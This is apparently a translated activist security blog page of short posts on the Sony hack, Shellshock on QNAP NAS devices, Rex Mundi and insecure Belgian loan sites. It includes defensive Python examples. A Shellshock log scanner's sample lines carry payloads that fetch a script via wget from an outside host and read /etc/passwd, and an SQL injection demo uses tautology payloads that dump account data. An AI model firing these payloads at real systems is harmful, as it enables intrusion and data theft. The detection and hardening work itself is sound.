No trust without independent control - Page 2

  • the CIA's playlist of music used as psychological torture on detainees

    source http://theantimedia.org/playlist-used-by-the-cia-to-torture-detainees/

    I imagine that listening to Sesame Street for 18 hours every day makes you so mad you just want to get out of there

    Deicide: Fuck Your God

    Dope: Die MF Die, Take Your Best Shot

    Eminem: White America, Kim

    Barney & Friends: theme song

    Drowning Pool: Bodies

    Metallica: Enter Sandman

    Meow Mix: commercial jingle

    Janeane Garofalo/Ben Stiller: chapter from the Feel This Audiobook

    Sesame Street: theme song

    David Gray: Babylon

    AC/DC: Shoot to Thrill, Hell’s Bells

    Bee Gees: Stayin’ Alive

    Tupac: All Eyez On Me

    Christina Aguilera: Dirrty

    Neil Diamond: America

    Rage Against the Machine: unspecified songs

    Don McLean: American Pie

    Saliva: Click Click Boom

    Matchbox Twenty: Cold

    (hed)pe: Swan Dive

    Prince: Raspberry Beret

  • the demonstration in New York against police brutality (or rather the lack of punishment for it), in timelapse

    a very interesting idea

    but they are not a million .....

    but these days you don't need millions to have an impact (you need the attention of the media - even for the wrong reasons)

  • Germany doesn't have an answer yet to the latest growing far-right movement

    source http://www.theguardian.com/world/2014/dec/15/dresden-police-pegida-germany-far-right

    it is easier when they are just plain Nazis and harder when they have gone deep undercover (among ordinary people who are not Nazis but are disturbed by ISIS and by militant Islamic preachers and movements)

  • #shellshock if you haven't patched your QNAP NAS devices you will get hacked

    some cloud providers have been hacked over the last few days

    this is an alert; read more about the problem by following the link

    "Shellshock is far from "over", with many devices still not patched and out there ready for exploitation. One set of the devices receiving a lot of attention recently are QNAP disk storage systems. QNAP released a patch in early October, but applying the patch is not automatic and far from trivial for many users[1]. Our reader Erich submitted a link to an interesting Pastebin post with code commonly used in these scans [2]


    The attack targets a QNAP CGI script, "/cgi-bin/authLogin.cgi", a well known vector for Shellshock on QNAP devices [3]. This script is called during login, and reachable without authentication. The exploit is then used to launch a simple shell script that will download and execute a number of additional pieces of malware:
    https://isc.sans.edu/forums/diary/Worm+Backdoors+and+Secures+QNAP+Network+Storage+Devices/19061

    and this comment shows why automatic patching is so important

    "I have one of the affected units. In the firmware update section of the admin interface, the closest thing I can find for an auto-updater is a checkbox that reads, "Automatically check if a new version is available when logging into the NAS web administration interface." From there, you have to manually tell the system to update -- as far as I can tell, there is no option to automatically update the unit. And the manufacturer doesn't send out emails to notify users when there is an update."
    http://arstechnica.com/security/2014/12/worm-exploits-nasty-shellshock-bug-to-commandeer-network-storage-systems/
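    The two checks an admin of an exposed NAS or web server wants after reading the diary quoted above: whether a given bash still runs code trailing a function definition passed in through the environment (the behaviour the authLogin.cgi attack relies on), and which requests in an access log carried that "() {" prefix in a header and whether they were aimed at the QNAP login CGI. This is an added example written for this page, not code from the ISC diary, the Pastebin post or QNAP; the log lines are constructed with RFC 5737 test addresses and the log format is assumed to be the common Apache/nginx combined format.

```python
"""Shellshock triage for a QNAP-style CGI exposure (added example).

1. bash_honours_env_functions(): does the local bash execute code that
   trails a function body smuggled in through an environment variable?
2. scan_access_log(): which logged requests carried the "() {" prefix in
   the Referer or User-Agent, and were they aimed at the QNAP login CGI?
"""
import re
import subprocess
from typing import Dict, List, Optional

# Function-definition prefix that unpatched bash evaluated out of any
# environment variable; scanners vary the whitespace, so be tolerant.
SHELLSHOCK_RE = re.compile(r"\(\s*\)\s*\{")
# Unauthenticated login CGI the ISC diary names as the QNAP vector.
QNAP_VECTOR = "/cgi-bin/authLogin.cgi"

# Combined log format. Cookie and other custom headers are not logged in it,
# so a hit here proves an attempt; a miss does not prove there was none.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)


def bash_honours_env_functions(bash: str = "bash") -> Optional[bool]:
    """True if `bash` runs the code after a function body passed via the
    environment (vulnerable), False if patched, None if it cannot be run."""
    env = {"x": "() { :;}; echo TRAILING_CODE_RAN"}
    try:
        out = subprocess.run([bash, "-c", "echo probe"], env=env,
                             capture_output=True, text=True, timeout=10)
    except (OSError, subprocess.TimeoutExpired):
        return None
    return "TRAILING_CODE_RAN" in out.stdout


def scan_access_log(lines: List[str]) -> List[Dict[str, object]]:
    """Return one record per header field that carries the Shellshock prefix."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        for field in ("referer", "ua"):
            value = m.group(field)
            if SHELLSHOCK_RE.search(value):
                hits.append({
                    "ip": m.group("ip"),
                    "path": m.group("path"),
                    "field": field,
                    "payload": value,
                    # a query string may follow the script name, hence startswith
                    "qnap_vector": m.group("path").startswith(QNAP_VECTOR),
                })
    return hits


# Constructed sample lines (RFC 5737 test addresses), not a real capture.
SAMPLE_LOG = [
    '198.51.100.7 - - [14/Dec/2014:03:12:41 +0000] "GET /cgi-bin/authLogin.cgi HTTP/1.1" '
    '200 512 "-" "() { :;}; /usr/bin/wget -O /tmp/S0.sh http://198.51.100.9/S0.sh"',
    '203.0.113.4 - - [14/Dec/2014:03:13:02 +0000] "GET /cgi-bin/authLogin.cgi HTTP/1.1" '
    '200 512 "() {:;}; echo; /bin/cat /etc/passwd" "Mozilla/5.0"',
    '192.0.2.10 - - [14/Dec/2014:03:15:00 +0000] "GET /cgi-bin/authLogin.cgi HTTP/1.1" '
    '200 512 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/34.0"',
    '192.0.2.12 - - [14/Dec/2014:03:16:30 +0000] "GET /cgi-bin/status.cgi HTTP/1.1" '
    '404 0 "-" "() { :; }; /bin/bash -c id"',
]

if __name__ == "__main__":
    print("local bash vulnerable:", bash_honours_env_functions())
    for hit in scan_access_log(SAMPLE_LOG):
        flag = "QNAP login CGI" if hit["qnap_vector"] else "other path"
        print(f'{hit["ip"]} {hit["path"]} via {hit["field"]} [{flag}]: {hit["payload"]}')
```

    On a patched bash the probe prints only "probe", so the function returns False; the second log line shows the prefix arriving through the Referer rather than the User-Agent, which is why both fields are checked.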

  • #sonyhack Sony tries to keep the leaks out of the mainstream press

    source http://www.bbc.com/news/entertainment-arts-30477257

    "Sony Pictures has contacted some US news outlets in an attempt to limit the damage caused by the hacking of its internal computer system last month.


    The studio, its letter informed them, "does not consent to your possession... dissemination, publication... or making any use of the stolen information".
    http://www.bbc.com/news/entertainment-arts-30477257

    this looks like Mensura here with me :)

    but then the press will only link to other media that use the information, or talk about unconfirmed rumours without even mentioning the leaks

  • #ukraine the diplomatic agreement over the North Pole is no more

    Denmark has told the UN panel responsible for dividing up the North Pole that it doesn't agree with the piece of the cake attributed to it and that it wants a lot more, at the expense of Russia (which is sending troops to the North Pole and setting up more military installations around it) and Canada

    http://www.bbc.com/news/world-europe-30481309

  • #sonyhack Sony in fact lost its root certificate, the certificate that signs the other Sony certificates

    among other things

    it means they will have to rebuild their whole certificate infrastructure and revoke all their old and current certificates

    source http://arstechnica.com/security/2014/12/hackers-promise-christmas-present-sony-pictures-wont-like/

  • NIST publishes new guidelines for security and privacy assessments

    The NIST Computer Security Division announces the release of Special Publication (SP) 800-53A Revision 4, Assessing Security and Privacy Controls in Federal Information Systems and Organizations: Building Effective Assessment Plans

    This update to Special Publication 800-53A contains significant changes to the 2010 version of the publication in both content and format.

    The full announcement of the release of SP 800-53A Revision 4, with all the details of the updated document, is on the CSRC News/Announcements page:
    http://csrc.nist.gov/news_events/#dec12

    Direct link to the SP 800-53A Revision 4 document (in .PDF):
    http://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-53Ar4.pdf

  • #ukraine the eastern members of NATO are going to help Ukraine themselves

    there is no sense waiting for a consensus that will never arrive, because the interests are too different to reach any kind of meaningful compromise - and Putin's strategy of keeping NATO from doing something meaningful in Ukraine is based on the premise that NATO will always find compromise more important than letting each member decide for itself what it is going to do to help, or not help, Ukraine

    now it will be much more difficult for Putin to stop NATO from helping and supporting Ukraine, because the power to veto, slow down or stop any meaningful decision of individual states is gone

    the eastern European states will start helping each other and Ukraine in the first place, meaning that after some time we will have a fortified, intertwined eastern border linked not only to NATO but also to each other

    and as real power, in Putin's mind, is military power, this may stabilise or even change the battlefield in Ukraine and make it less likely that individual eastern states are impressed by his succession of military provocations and exercises at their borders

    meanwhile Russia keeps sending new military hardware to the border with Ukraine and then into Ukraine, bit by bit, day after day (some of the columns are heading for Mariupol)

  • we are going on strike - see you on Tuesday

    what did you expect

    I am an activist

    and my fight for privacy and security is independent of my political views - it always has been - because it is the only way to build coalitions that can change things

    but for now

    I am on strike

  • according to the Privacy Commission the victims are responsible for all the costs of their data loss

    this is what, at the moment, has to be in the notification to the affected persons:

    • the name of the data controller,

    • the contact details of a contact point where additional information can be obtained,
    • a summary of the incident that affected the personal data,
    • the presumed date of the incident,
    • the nature and scope of the personal data involved,
    • the conceivable consequences of the data leak for the persons concerned,
    • the circumstances under which the data leak took place,
    • the measures the controller has taken to remedy this data leak,
    • the measures the controller recommends to the persons concerned to limit the possible damage.
    http://www.privacycommission.be/nl/melding-gegevenslekken-algemeen

    so the costs and the inconvenience of changing your bank account or your mobile number are entirely for the victim; in fact this is called double victimisation, as with rape

    because if the data are then abused afterwards, it is suddenly the fault of the victim, who did not do everything he should have done according to the cause of the leak (the insecure data collector)

    no, in my opinion it is the cause of the data leak, the insecure data collector, who has to inform the banks if there are bank account numbers in the leak, the mobile phone companies if there are mobile numbers in it, and so on

    this is how it is done in the US and maybe we should adopt that example

    then suddenly many more companies will pay more attention and ask for far fewer data that they could also obtain through a safer route

  • Microsoft is fucking up its once so fantastic automatic update service

    do they understand how important this is for the security of the machines?

    if people stop downloading security updates automatically, then we are creating a situation in which we go back to 2004

    we should be able to trust Microsoft to have put every needed resource into this process so that we can continue to trust it

    and breaking updates and drivers for hardware that is so well known shows that something is going totally wrong in quality control

    source http://www.forbes.com/sites/jasonevangelho/2014/12/13/new-windows-7-patch-is-effectively-malware-disables-graphics-driver-updates-and-windows-defender/

  • #rexmundi why does he work in Belgium?

    it is quite simple

    the minister for privacy doesn't want the Privacy Commission to have more powers and more resources, and the Privacy Commission itself told me last week that it is not responsible for the security of the internet and that it doesn't have the resources - maybe once the European directive on data protection comes into force

    so who is responsible for the security of the internet?

    the prime minister? well, the new federal centre for cybersecurity has been announced for years, but after a lot of talk about who should be the general and who the colonels they may finally be deciding to set it up; still, they don't seem to make it a priority, announcing it for somewhere in 2015 while not being sure there is any funding for it

    the CERT? the CERT is not responsible for the security of the internet; it tries to handle the incidents it receives, not the incidents it would want to prevent from happening (which is why you can't call them the firemen of the internet over here, because they don't have those powers or resources)

    the national bank and the financial sector have some rules and controls (although at the national bank the cell responsible for the IT security controls of the banks - even though this is becoming a big responsibility internationally - is small and has very few powers and resources, and best of all, the online credit and loan companies are explicitly excluded from these controls without anyone naming who is responsible for them)

    maybe the sector could do it? yes, the sector could do it, and there are some initiatives, but you see that they don't work; if the same kind of controls were applied in other fields of our economy or in real life, it would be a quite bloody mess around here

    so this is worse than the Titanic

    there isn't even a captain on board, and the crew is underpaid, understaffed and doesn't really know what it is supposed to do

    so if you were Rex Mundi, why would you make your life difficult?

    you do some Google searches and find the forms, you do some quick checks to see whether the form has an SQL injection or not, and once you see that there is one, you download the data and send an email; in a number of cases you get paid and in others you get publicity

    should we keep quiet about Rex Mundi?

    well, no, because whether we give it publicity or not, the data are online, and they are the data of our citizens, who either don't know that their data have leaked or are informed but that is it - they don't do anything more (not paying for another mobile number, the cost of changing your email address and all your passwords, bank accounts and so on)

    the people have the right to know that this is a mess, that nobody is telling them, and that the people who should clean it up are too few, with too few resources and too few powers to intervene and prevent incidents from happening

    it is all very well for ministers and parliamentarians to say how bad it is

    DO SOMETHING ABOUT IT NOW
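    The "quick checks" on a form field described above, and what separates a form that has an SQL injection from one that doesn't, as an added example for this page (not Rex Mundi's tooling and not code from any of the sites named): a constructed in-memory SQLite table stands in for a credit-request backend, one lookup pastes the field value into the SQL text, the other binds it as a parameter, and the probe runs the two checks an attacker would run against both.

```python
"""Form-field SQL injection: the quick check and the fix (added example).

The probe sends a lone quote (does the query break?) and a tautology
(does the result set widen?). The vulnerable lookup interpolates the
field into the SQL; the safe one binds it, so it can never become grammar.
"""
import sqlite3
from typing import Callable, List, Tuple

Row = Tuple[int, str, str]
Lookup = Callable[[sqlite3.Connection, str], List[Row]]


def build_demo_db() -> sqlite3.Connection:
    """Constructed in-memory table standing in for a credit-request backend."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE applicants (id INTEGER PRIMARY KEY, email TEXT, iban TEXT)")
    conn.executemany("INSERT INTO applicants (email, iban) VALUES (?, ?)", [
        ("an@example.test", "BE00 0000 0000 0001"),
        ("bert@example.test", "BE00 0000 0000 0002"),
        ("chris@example.test", "BE00 0000 0000 0003"),
    ])
    conn.commit()
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, email: str) -> List[Row]:
    # The form value is pasted into the statement, so quotes in it are SQL.
    sql = f"SELECT id, email, iban FROM applicants WHERE email = '{email}'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn: sqlite3.Connection, email: str) -> List[Row]:
    # Bound parameter: the driver passes the value apart from the SQL text.
    sql = "SELECT id, email, iban FROM applicants WHERE email = ?"
    return conn.execute(sql, (email,)).fetchall()


def looks_injectable(lookup: Lookup, conn: sqlite3.Connection) -> bool:
    """Black-box probe: a database error on a bare quote, or more rows for
    a tautology than for a plain unknown value, means the field reaches SQL."""
    try:
        lookup(conn, "'")
    except sqlite3.Error:
        return True
    baseline = lookup(conn, "nobody@example.test")
    widened = lookup(conn, "nobody@example.test' OR '1'='1")
    return len(widened) > len(baseline)


if __name__ == "__main__":
    conn = build_demo_db()
    dump = "x' OR '1'='1"
    print("vulnerable lookup injectable:", looks_injectable(lookup_vulnerable, conn))
    print("rows dumped by the tautology:", lookup_vulnerable(conn, dump))
    print("safe lookup injectable:", looks_injectable(lookup_safe, conn))
    print("same payload through the safe lookup:", lookup_safe(conn, dump))
```

    The tautology turns the vulnerable query into `WHERE email = 'x' OR '1'='1'` and returns every applicant's IBAN; the same string through the bound parameter is just an email address nobody has, and returns nothing. The probe is deliberately the same for both, because that is all it takes for someone scanning forms at scale.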

  • rs-krediet.be asks for all your personal details but uses no encryption when you fill them in

    in fact this means there is no real certificate on the form page

    there is some encryption on the server itself, but it is not clear whether there is any encryption when the information is transferred

    part of their forms

  • ls-krediet.be wants all your personal data but doesn't protect it with real encryption

    another certificate that doesn't work

    and that certificate is expired and weak

    but they want all this personal data from you online, without even a login
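    Two checks that turn the two findings above (a form that sends personal data without encryption, and an expired certificate that doesn't match) into something repeatable, as an added example for this page and not code from either site: one walks a page's forms and reports every submit target that would go over plain http, the other assesses a certificate in the dict form Python's `ssl.getpeercert()` returns for expiry and hostname coverage. The HTML and the certificate below are constructed samples, and the `.test` hostnames are placeholders, not the sites named above.

```python
"""Form transport and certificate checks for a data-collecting site (added example)."""
import socket
import ssl
import time
from html.parser import HTMLParser
from typing import Dict, List, Optional, Union
from urllib.parse import urljoin, urlsplit


class _FormCollector(HTMLParser):
    """Collect the action attribute of every <form> on a page."""

    def __init__(self) -> None:
        super().__init__()
        self.actions: List[str] = []

    def handle_starttag(self, tag, attrs):
        if tag == "form":
            self.actions.append(dict(attrs).get("action") or "")


def insecure_form_targets(html: str, page_url: str) -> List[str]:
    """Absolute submit URLs of forms that would send their fields in clear.
    An empty or relative action resolves against page_url, so every form on
    a plain-http page is insecure even when no action is given."""
    collector = _FormCollector()
    collector.feed(html)
    insecure = []
    for action in collector.actions:
        target = urljoin(page_url, action)
        if urlsplit(target).scheme.lower() != "https":
            insecure.append(target)
    return insecure


def san_matches(pattern: str, host: str) -> bool:
    """RFC 6125 style matching: one wildcard, leftmost label only."""
    pattern, host = pattern.lower(), host.lower()
    if pattern.startswith("*."):
        return host.count(".") == pattern.count(".") and host.endswith(pattern[1:])
    return pattern == host


def assess_certificate(cert: Dict, hostname: str,
                       now: Optional[Union[float, str]] = None) -> List[str]:
    """Findings for a certificate in the dict form ssl.getpeercert() returns;
    `now` is an epoch float or an openssl-style "Mon DD HH:MM:SS YYYY GMT" string.
    Key size and signature algorithm are not in that dict: take the DER form
    (fetch_peer_cert_der) and read it with openssl x509 -text for those."""
    if now is None:
        now = time.time()
    elif isinstance(now, str):
        now = ssl.cert_time_to_seconds(now)
    findings = []
    not_before = ssl.cert_time_to_seconds(cert["notBefore"])
    not_after = ssl.cert_time_to_seconds(cert["notAfter"])
    if now > not_after:
        findings.append(f"expired on {cert['notAfter']}")
    if now < not_before:
        findings.append(f"not valid before {cert['notBefore']}")
    dns_names = [v for k, v in cert.get("subjectAltName", ()) if k == "DNS"]
    if not any(san_matches(n, hostname) for n in dns_names):
        findings.append(f"{hostname} is not covered by subjectAltName {dns_names}")
    return findings


def fetch_peer_cert_der(host: str, port: int = 443, timeout: float = 10.0) -> bytes:
    """Retrieve the leaf certificate without verifying it, so an expired or
    mismatched one can still be inspected. Caveat: with CERT_NONE Python's
    getpeercert() returns {} for the parsed form, so only the DER is useful;
    decode it with `openssl x509 -inform DER -noout -text`."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    with socket.create_connection((host, port), timeout=timeout) as sock:
        with ctx.wrap_socket(sock, server_hostname=host) as tls:
            return tls.getpeercert(binary_form=True)


# Constructed samples; the .test names are placeholders, not the sites above.
SAMPLE_HTML = """
<form method="post" action="/aanvraag/verstuur"><input name="rijksregisternummer"></form>
<form method="post" action="http://cdn.example.test/collect"><input name="iban"></form>
<form method="post"><input name="gsm"></form>
<form method="post" action="https://secure.example.test/apply"><input name="email"></form>
"""
SAMPLE_CERT = {
    "subject": ((("commonName", "www.ls-krediet.test"),),),
    "issuer": ((("commonName", "Example Issuing CA"),),),
    "notBefore": "Dec 15 00:00:00 2012 GMT",
    "notAfter": "Nov 30 23:59:59 2014 GMT",
    "subjectAltName": (("DNS", "www.ls-krediet.test"),),
}

if __name__ == "__main__":
    print(insecure_form_targets(SAMPLE_HTML, "http://www.rs-krediet.test/aanvraag"))
    print(assess_certificate(SAMPLE_CERT, "ls-krediet.test", now="Dec 15 12:00:00 2014 GMT"))
```

    The form check is the one that matters for a site asking for a national register number or an IBAN: a page served over http, or a form whose action points at an http URL, sends the fields in clear whatever certificate the server happens to hold. The certificate check deliberately takes a dict rather than opening a connection, because a verifying TLS client refuses to talk to an expired or mismatched certificate at all, and the unverified fetch only gives you the DER.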